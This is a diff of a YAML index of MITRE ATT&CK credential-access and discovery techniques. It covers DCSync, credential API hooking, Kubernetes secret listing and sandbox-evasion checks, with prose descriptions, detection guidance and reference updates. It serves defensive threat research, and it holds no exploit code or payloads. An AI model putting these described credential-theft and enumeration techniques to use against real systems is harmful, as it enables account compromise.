-          and Detection. Retrieved August 7, 2017.
-        source_name: ADSecurity Mimikatz DCSync
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved August 7, 2017.
-        source_name: Harmj0y Mimikatz and DCSync
-      - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
-        description: Warren, J. (2017, July 11). Manipulating User Passwords with
-          Mimikatz. Retrieved December 4, 2017.
-        source_name: InsiderThreat ChangeNTLM July 2017
-      - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
-        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
-          August 7, 2017.
-        source_name: GitHub Mimikatz lsadump Module
-      - url: https://msdn.microsoft.com/library/cc237008.aspx
-        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
-          Retrieved December 6, 2017.
-        source_name: Microsoft NRPC Dec 2017
-      - url: https://msdn.microsoft.com/library/cc245496.aspx
-        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
-          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
-        source_name: Microsoft SAMR
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved December 4, 2017.
-        source_name: AdSecurity DCSync Sept 2015
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved December 4, 2017.
-        source_name: Harmj0y DCSync Sept 2015
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:54:08.312Z'
       name: 'OS Credential Dumping: DCSync'
       description: |-
         Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
@@ -48283,26 +48945,88 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - ExtraHop
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
 
         Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+      created: '2020-02-11T18:45:34.293Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/006
+        external_id: T1003.006
+      - source_name: GitHub Mimikatz lsadump Module
+        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+          August 7, 2017.
+        url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+      - source_name: ADSecurity Mimikatz DCSync
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved August 7, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: AdSecurity DCSync Sept 2015
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved December 4, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: Microsoft DRSR Dec 2017
+        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc228086.aspx
+      - source_name: Microsoft NRPC Dec 2017
+        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+          Retrieved December 6, 2017.
+        url: https://msdn.microsoft.com/library/cc237008.aspx
+      - source_name: Microsoft GetNCCChanges
+        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+          4, 2017.
+        url: https://msdn.microsoft.com/library/dd207691.aspx
+      - source_name: Microsoft SAMR
+        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc245496.aspx
+      - source_name: Samba DRSUAPI
+        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+        url: https://wiki.samba.org/index.php/DRSUAPI
+      - source_name: Harmj0y DCSync Sept 2015
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved December 4, 2017.
+        url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: Harmj0y Mimikatz and DCSync
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: InsiderThreat ChangeNTLM July 2017
+        description: Warren, J. (2017, July 11). Manipulating User Passwords with
+          Mimikatz. Retrieved December 4, 2017.
+        url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+      - source_name: Wine API samlib.dll
+        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+        url: https://source.winehq.org/WineAPI/samlib.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.006
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -48315,6 +49039,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -48351,17 +49076,17 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -48407,81 +49132,10 @@ credential-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
-      type: attack-pattern
-      created: '2020-02-11T19:01:15.930Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1056.004
-        url: https://attack.mitre.org/techniques/T1056/004
-      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
-        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
-          Retrieved December 18, 2017.
-        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
-        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
-          December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
-        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
-        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
-          12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
-        description: Stack Exchange - Security. (2012, July 31). What are the methods
-          to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-27T21:03:56.385Z'
       name: 'Input Capture: Credential API Hooking'
       description: |
         Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -48494,28 +49148,94 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
 
         Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
 
         Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      created: '2020-02-11T19:01:15.930Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
+      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+          Retrieved December 18, 2017.
+        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+      - source_name: Microsoft Hook Overview
+        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+          December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
+        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
+        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+          12, 2017.
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
+        description: Stack Exchange - Security. (2012, July 31). What are the methods
+          to find hooked functions and APIs?. Retrieved December 12, 2017.
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1056.004
     atomic_tests: []
   T1552.007:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:25:28.820Z'
       name: Kubernetes List Secrets
       description: "Adversaries may gather credentials via APIs within a containers
         environment. APIs in these environments, such as the Docker API and Kubernetes
@@ -48572,9 +49292,8 @@ credential-access:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.007
     atomic_tests: []
   T1556.004:
@@ -48605,7 +49324,7 @@ credential-access:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -48629,8 +49348,6 @@ credential-access:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 discovery:
   T1033:
@@ -48695,12 +49412,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1033
     atomic_tests: []
   T1613:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:08:50.706Z'
       name: Container and Resource Discovery
       description: "Adversaries may attempt to discover containers and other resources
         that are available within a containers environment. Other resources may include
@@ -48759,7 +49475,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1613
     atomic_tests: []
   T1016.001:
@@ -48780,7 +49495,7 @@ discovery:
       - source_name: mitre-attack
         external_id: T1016.001
         url: https://attack.mitre.org/techniques/T1016/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-25T17:03:26.632Z'
       name: 'System Network Configuration Discovery: Internet Connection Discovery'
       description: |-
         Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
@@ -48801,13 +49516,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1016.001
     atomic_tests: []
   T1069:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:03:06.294Z'
       name: Permission Groups Discovery
       description: |-
         Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -48830,15 +49543,14 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Group: Group Metadata'
@@ -48864,13 +49576,12 @@ discovery:
         url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1069.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:51:35.759Z'
       name: Cloud Groups
       description: |-
         Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -48895,12 +49606,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -48942,13 +49652,12 @@ discovery:
         url: https://github.com/True-Demon/raindance
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1615:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-01-06T12:41:08.579Z'
       name: Group Policy Discovery
       description: |-
         Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -49009,12 +49718,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1615
     atomic_tests: []
   T1652:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:07:16.804Z'
       name: Device Driver Discovery
       description: |-
         Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -49078,19 +49786,18 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1652
     atomic_tests: []
   T1087.002:
     technique:
-      modified: '2024-04-15T21:33:57.732Z'
+      modified: '2024-05-31T04:00:37.651Z'
       name: 'Account Discovery: Domain Account'
       description: "Adversaries may attempt to get a listing of domain accounts. This
         information can help adversaries determine which domain accounts exist to
         aid in follow-on behavior such as targeting specific accounts which possess
         particular privileges.\n\nCommands such as <code>net user /domain</code> and
         <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039)
-        utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code>
+        utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code>
         on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
         cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code>
         may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
@@ -49137,7 +49844,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.002
     atomic_tests: []
   T1087.001:
@@ -49204,12 +49910,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.001
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -49299,18 +50004,17 @@ discovery:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests: []
   T1069.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:16:47.754Z'
       name: 'Permission Groups Discovery: Domain Groups'
       description: |-
         Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
@@ -49353,12 +50057,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.002
     atomic_tests: []
   T1007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:55:18.326Z'
       name: System Service Discovery
       description: |-
         Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
@@ -49399,12 +50102,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1007
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -49489,7 +50191,6 @@ discovery:
